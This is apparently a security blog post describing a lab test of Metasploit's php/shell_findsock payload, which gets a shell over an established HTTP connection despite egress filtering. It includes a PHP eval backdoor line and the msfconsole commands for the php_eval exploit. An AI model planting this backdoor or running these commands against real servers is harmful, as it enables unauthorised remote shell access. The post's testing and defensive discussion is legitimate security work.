Back|Track, Debian, Metasploit, OpenSourceSoftware, Security, Ubuntu

Spawning a shell on the established connection to the webserver in Metasploit.

A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. Setting up a new LAMP server etc, making sure its only can connect out to the places it should need to have access too, is a good security practice. Then open port 80 for connection from the world, minus .ru and .cn etc 🙂

So I thought…

Then egypt, from metasploit, made and presented me to the “php/shell_findsock payload”, which I think is awesome!

If you can get the LAMP server to some way execute the $shell_findsock payload, you can in many cases get a shell over the established http connection! You can also use the payload with other php exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. But on my Ubuntu intrepid, I got :
sh: Syntax error: Bad fd number
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.

In the test case, I left my “backdoor” on the server in test.php with the code: <?php eval($_GET[‘evalme’]); ?>, which would be the default for this metasploit setup.
Short version:

msf < use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST
msf exploit(php_eval) > exploit

Metasploit with payload php/shell_findsock

And you thought that you where safe!

On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s